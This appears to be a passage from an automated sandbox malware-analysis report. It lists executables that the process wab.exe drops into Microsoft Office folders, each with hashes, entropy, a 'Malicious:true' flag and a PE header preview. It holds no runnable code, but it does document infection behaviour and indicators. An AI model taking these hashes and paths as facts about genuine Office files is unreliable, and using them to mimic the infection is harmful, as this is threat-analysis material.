                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):275872
                                                                                                Entropy (8bit):3.942096448686192
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3Vo06gJJRaCAd1uhNRu7z3zHt4s+zbCtbCc0xXNmi9RHYOqEWpVOYlOj:/rkn6gxe7z3OzY+9jTYbE+la
                                                                                                MD5:61B5DB2F53781D6F8236546BA08301C2
                                                                                                SHA1:D9702B47E98A10449322EFD5153CD297FF913D5F
                                                                                                SHA-256:F9732C0E5E5B0DCCE692BD04AFAC17DCB68C9521109D49635D309144077D8323
                                                                                                SHA-512:F2D93CFFA723E19BEFB62B2663DCB4C5DD363F5E3EBC38BC43B853ACEF00C210AA417E753B5A18F7B353CF0EB4123764A99BFC06E416344D7589A52CB3277D40
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):751520
                                                                                                Entropy (8bit):6.454372812643737
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:1ccV8BFJ0kz4uP9V6wY2M48aVNfffNfYRweSat8UVNfffNfRtAUUn4lDW7f5sBzl:1OFJbl/6r2M48aVNfffNfWVNfffNfDw+
                                                                                                MD5:0F5EA69F9B731ED7976FE7A5BE3112C9
                                                                                                SHA1:F215DEEA7A962AD53918B357D3446C87F20B35DE
                                                                                                SHA-256:FD7C87041D679B9DD33771C07F05E926623285DFBCD03E4C2285872796213643
                                                                                                SHA-512:298081DEAF16A6647C0345931B9E265C0FF62045EDF455F1A05D5A0DF1F926152E4945D707EFD09D0020FE42C798AAD8CEBCD3485DB3EC69201E95BF1357D22A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):182712
                                                                                                Entropy (8bit):5.991097370883514
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkDDbGpEPwVH+lMCNy0GEVVS1ikLrDdevXqHai8MBEL4:AXSSwVgvfkhvzHcWEM
                                                                                                MD5:2ECB09CF5AC73C6FA0F79F569C5F5E33
                                                                                                SHA1:021A327B831B7274F99D0CC901D53F60C2FD6DEB
                                                                                                SHA-256:67D9B8EE314FFDDCDB506B2406A0DE54FC016CF45BB290F905B0C21E0D1B97F0
                                                                                                SHA-512:C3A3EAEB57F06E8316B0F2A3AE9F53F26A226F1472403A482BF64D25922D53D4AE5407BC0BC3099CFF6016D9CA6023508653D68C0BF67F25627E9492C49F1338
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):5174360
                                                                                                Entropy (8bit):7.254989378596742
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Z/xFnOvtaWIDn0apLKkLJU9nU2foKhA4vSWidGHp+NDGQUzbpDOfjxAkrQKl+RPp:LtLK3BDhtvS0Hpe4zbpaAKQkroGIz
                                                                                                MD5:9C81D83BB362C1DE8724A9D0F2FDE901
                                                                                                SHA1:804F2A1A3452F0EE2A2927D2817FDED08537AF86
                                                                                                SHA-256:B620BDB560C23896656F932757F75224BAA4F021EF5273E0E50C2D0589CA0DEE
                                                                                                SHA-512:2BCB260191D9B41C17C2967369F9376032084A2C849DF07C1CB36B0C7BDCDF33CBBF3DF5DC4F1E562608C9B1B33183DCD5E8E7C06907B6DFA8F971D6E600D1C6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):139712
                                                                                                Entropy (8bit):6.126888776763665
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkyU5adWAKmzUccnzkVBgEuKjj0WWtPPoI:o+EjzCg+j6P3
                                                                                                MD5:01C07B3F77E45B90A01EF08F9085EDAC
                                                                                                SHA1:88E01F7DB25790C04120D1F0B07CE7FEDE5CC00D
                                                                                                SHA-256:1BB7ABD1F7910288188F0E5BF4F47548F5D1DDB8D71DC3A7425BF85E4FE5D1C8
                                                                                                SHA-512:95213B6441F935826322EB8B3B1C77C9E853362FB391014EC440311DC06893D023BC88A57A4FFB7F5C111278C450D1D1B06FCC694FBBF199D4538EC37BB02240
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):380368
                                                                                                Entropy (8bit):6.555084907734949
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:2zgSb/029S2P/7nzGxFrRN0r0ivCZci1FXiO8DaS4wwE0CBlFJmcx:Nw/2q/roN7ivCZci1FC74wdBlFYU
                                                                                                MD5:AA927AD1ECD836AC249D42BF94DE3A65
                                                                                                SHA1:51FF7EE07974A0BDD31A14E15C652832026C9700
                                                                                                SHA-256:7F7D93ECFB08D1D594AA97FF649C18078A78239E8716F7D4AA369DC5733EAA9F
                                                                                                SHA-512:A942E512BEC89434D862BF09E39C157F6FE1243B31C0719EE5257285ADE088F532F3DAD6AADDC2D9DB29C0D1B26E39DF8B79C825D8721C522E9BD286809AA161
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1269696
                                                                                                Entropy (8bit):3.675615217628684
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:Yvk8/0NhFYAddenZhUhTNnLUrh+9nTGLljX4wuSzVF:k4wXF
                                                                                                MD5:B02491C0452A296007FEFEC01AABABFB
                                                                                                SHA1:8E83A59312B8FE84FCAFF98D0A4180A4653BA36D
                                                                                                SHA-256:2458D82B300F063EBDFB5495840EEFBDF86B6A331AE80C4B93C0D007435F372B
                                                                                                SHA-512:E1D9154181404195A0FB1BFF2680F3B534EA248C393623D9E60FC0E5CF7CFDE3C11CEFD7D4F562C176E08856656612E68EA130FE1EBF6F3D66BCF130DD3EC9D2
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):266648
                                                                                                Entropy (8bit):3.885766319937084
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VodRaCAd1uhNRuiazvhzpwtWhz7I3EWwwrwYx6RPWdn6ysl4DU1:/rkcezzvhF1h3wEWwwbx6ksl4D
                                                                                                MD5:8B9DFC043238EDCB783ECD8C41A25945
                                                                                                SHA1:FE7717581B04B161C6B461B00A614124B6CDA020
                                                                                                SHA-256:09188D2E565E81399A01D92C291905CF50D750534526C03FC2B431EBA7893127
                                                                                                SHA-512:9A17436D210A2B7C124CF89FDF947595D31B381679AFA394CE4CB91FCF867FD630DCDD5A13ECA03CAE77DB09761E86D9F83FC41A4E83D48C1BB1C173F605A75C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):715760
                                                                                                Entropy (8bit):6.454139818255074
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:a4tuuLntIMDXw5vde5EFf1Pmbd3lSz3dfp1Swf5M0blmFKuJOJZM30j3:dtFDKMg4iX3djfy0blmFlme303
                                                                                                MD5:23804F478E35BBD0AD391BFA092BDFFF
                                                                                                SHA1:93151FCABF6BB06771C9FD34A51D28F8300AAB3B
                                                                                                SHA-256:62FC292394A77E876CC3F11A17E5A21D1CF799F16D79055FE8F64E8CC240EB97
                                                                                                SHA-512:F674FA98BF32A0A174942E55751CF37BB394B2109A878755144A5924110DCF1C4008DE2EFA1A7690D6058ED19B3EC1235BC134BF722771CC866173EA4D89280D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):619944
                                                                                                Entropy (8bit):6.5605409599727995
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:nM/Of/Bboj+clWnIKgrP6TFPLNWuX4Pemn3oi8ky9Q8WSe/aSqizuO1qukdQAPnQ:M8JgryFPLNWuX40RulAPn1OcnGVNfffl
                                                                                                MD5:0B36F896C07E98A40764FE8764947E5A
                                                                                                SHA1:215A5AFC0DE422777682183200EBD4EFF5367268
                                                                                                SHA-256:31B10F09605AF8492130A972EF3801D14E70FF683142EA2934323F3FA9353DF8
                                                                                                SHA-512:2D613456F0C75693A67DAE00656E6C936AB83B577F7C6DB89F3EDC3A57145667AEFFF6A407146A83309C12B49AA0690ABE85A3C4D7E7C673260121ED85189E99
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):150416
                                                                                                Entropy (8bit):6.119086865011351
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkQQPtLW7twRxI5mc5TNN3AsdVgNwihwT3RqEM6ZOfHXb42:ZQMzhdV0nh4Hof7
                                                                                                MD5:0A9BABF248FD0BFACE70269A780E12B3
                                                                                                SHA1:7300CD652E38734C26E4E1BCC6B2CCB06C69D335
                                                                                                SHA-256:D17798E73699309E0889A1C09746EE5F7C4AE74F88BAF39434DAB06025B72535
                                                                                                SHA-512:E3281E6CA9ADDE9542F6E80363D28FA870E16757625A7EB74837AEA773F178EAB17B7DA51DC4780747BCC04F9FC3C98BC379F7AF09C1F54642FA8C15ED414D7E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):264576
                                                                                                Entropy (8bit):6.453478056220304
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkMPuf72UasmkUTFxn40Zo2KoKik9CxIUUksZcRySTn2TGz+WXwMQuDyaqfqORM:l872jsLuLnPo2TTHswP2TGz3FUCHySYI
                                                                                                MD5:FC28EB6FD5C6251911227A55E5F54776
                                                                                                SHA1:9A3066DE720838BCDE5A0CD3295103DBAE51E980
                                                                                                SHA-256:5439B9E784639C61CB1089FED2ED359A9CB9BE303CFB5C976E75D60AB929636B
                                                                                                SHA-512:3DB3DD90B31A176CCF33E7FCCD484A54785E8E33100B88D150BAFA16DB44075A038AA3BCBCF3947799E2C77E69675ED4E90F5E66B1B3A455E1E8A0F30A505EBF
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):108448
                                                                                                Entropy (8bit):5.433980224483478
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3Vo9weqz1lezmtJwzojsKyyJFGgHZ//rHzb:/rk2qzXe0wSyyJFD//Hb
                                                                                                MD5:96BEF7D0D48512DC35CDD2D4B1FD6EAD
                                                                                                SHA1:0EEE984FAC4294D58E25C692C087DFE601D67D01
                                                                                                SHA-256:00F9AECF764C5846BD073E8C08BB1CB82388123CCE4B05BC518C3914C941E38E
                                                                                                SHA-512:8B3D4D36DC5D77926EB0EB0A1F98C9D40A97457D9F586E6A722093D0F43321FB4709EB799DE85827C705EDA783C5BA847648D9EBF34B014FD932B21D2D57B9EA
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):662600
                                                                                                Entropy (8bit):5.905694343231267
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:Dpo/FEVciSJJtH4PoR6moWEBfQLxZPhEx7xgtV2hv4tkYUK2tlIqR7lmNK/IKrtK:SFEWi4JtH4PoRfoFIxZPk0NKbB0R
                                                                                                MD5:67BF76A8779842B6187E7EF286154124
                                                                                                SHA1:2ED18F92D51D677FDC3695406CDA01F5C188E3A0
                                                                                                SHA-256:3E4B1C352CE41EA00B9A1BFCFEB4693AEE09E27F5B7F2A46CF3CD00A35FA8FBA
                                                                                                SHA-512:A622980F704777BF7115BF9A06AFB89BE0771BC835B11E944A8C592CB3FA05071386ED94547D6159AC03F6F3719AF4726363AC4FC1F0EB10370CB3A4F1A5EF8F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):260560
                                                                                                Entropy (8bit):5.172772453978791
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkp4ZAh7ULoQdHBjw8Q2pFj4+W1ISYpksZmRohnonRBfTjzJEthEWV:cPfQdhMuj4VM8imPjGthEWV
                                                                                                MD5:9A855D46CF345F40A323616382F3455B
                                                                                                SHA1:69629A04683AC5A7163F8BBBF1BB2CB823B17D6B
                                                                                                SHA-256:569B5CC8EF232D6674DBEC8D78F81E70023D6EEABBE974DFC68FF4DB763FEAF5
                                                                                                SHA-512:DB43F60397080E72BCC5A9B8F24E0833EDADE5C85880F357AE50F0604D2DB2235F1D93F089AA57826DE1E82A8719DFF8CA0F502E7AA0AE37E1DB7229DF139751
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4316200
                                                                                                Entropy (8bit):3.8981940471710472
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:pYN3nsBQ5ghvEyqf/whWovz9hRJ5RbisrbdsPO9jXsw:eN3nsBcghvEyqf/whxz9hRJ5Rbisrbdr
                                                                                                MD5:002CF143B2DB2AD8C0242ADA462F145E
                                                                                                SHA1:77DE72A11B14F402C4D501C69BC3FD8B51B4642D
                                                                                                SHA-256:75A84EE4590896B68F4D17E5247BA9C76E2809CEB341EEB201493D617D5C7601
                                                                                                SHA-512:5BBA377866F2D2AFAC1DFA2201A26A1A1B6491982F0389DCBD5815E6FD9AF7D7110AEC8608926D307437F48501D0E3E4BF89DDA7FEB98214D79B1BFE7510B6BD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):124056
                                                                                                Entropy (8bit):5.162520482821961
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                                                MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                                                SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                                                SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                                                SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):358336
                                                                                                Entropy (8bit):4.285457679979659
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:/yUkKOEEIK128d2VKjw0EYsfZJnPmTuJjac2a51lHpLszc/kzY56Y:/x/B/kib
                                                                                                MD5:1A65939043DF2CEAD4643A92E4976D91
                                                                                                SHA1:B04C8E1BAB15CE5F05071904D4DFD5DA7188EF72
                                                                                                SHA-256:A813B53FB7C77DBE4E67D76A488C2B53A298824A6A1BB010FF55FDECFF7A7082
                                                                                                SHA-512:BE08E9D6315BDAC96667D3FD36B785EC35F35BD25C7EB6A9421DE403430552F1695707B083C3CA99E30D4FDA33A0A71E10DEA89E65BBFB91FAD35D237B5D45C3
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):763032
                                                                                                Entropy (8bit):4.0026170623684765
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkcwRnjnzhCiXXXXXX1AzZwAazTwdOLxN1IHO:TwRnj7XXXXXXSzuz8OZ
                                                                                                MD5:5B45157A040A388147F2A881D0DD0AD5
                                                                                                SHA1:413FD5E5DB3174D558F3EBE70688A5C41E5DE109
                                                                                                SHA-256:BF906BC259DBEB8D7B45F8CC41A7A7C26576B018AFCD7EE7DC7F2743F8375CE2
                                                                                                SHA-512:5B0E915CDCF2F844AE8C5E10D9282382DD3198C8EB67556774DAA85225128307D958D0A457E89EEE66FB87DCBB1FEAE4DF85EC52364930FA58E45DACBC5D9D27
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):895120
                                                                                                Entropy (8bit):2.860376586914997
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkofCEq7tOxIfMFzCEpAm/4rx7z1arf+9:az8w
                                                                                                MD5:DE69185016C6898EB989FF0FFE42D0F3
                                                                                                SHA1:AF2EBD25315FFC7C3C2981DE9371D0827B8AF7D5
                                                                                                SHA-256:FF89208A70C006CF7CDC585CA29387C24CEEBE2FC239D0D16EBBBBE2DE672899
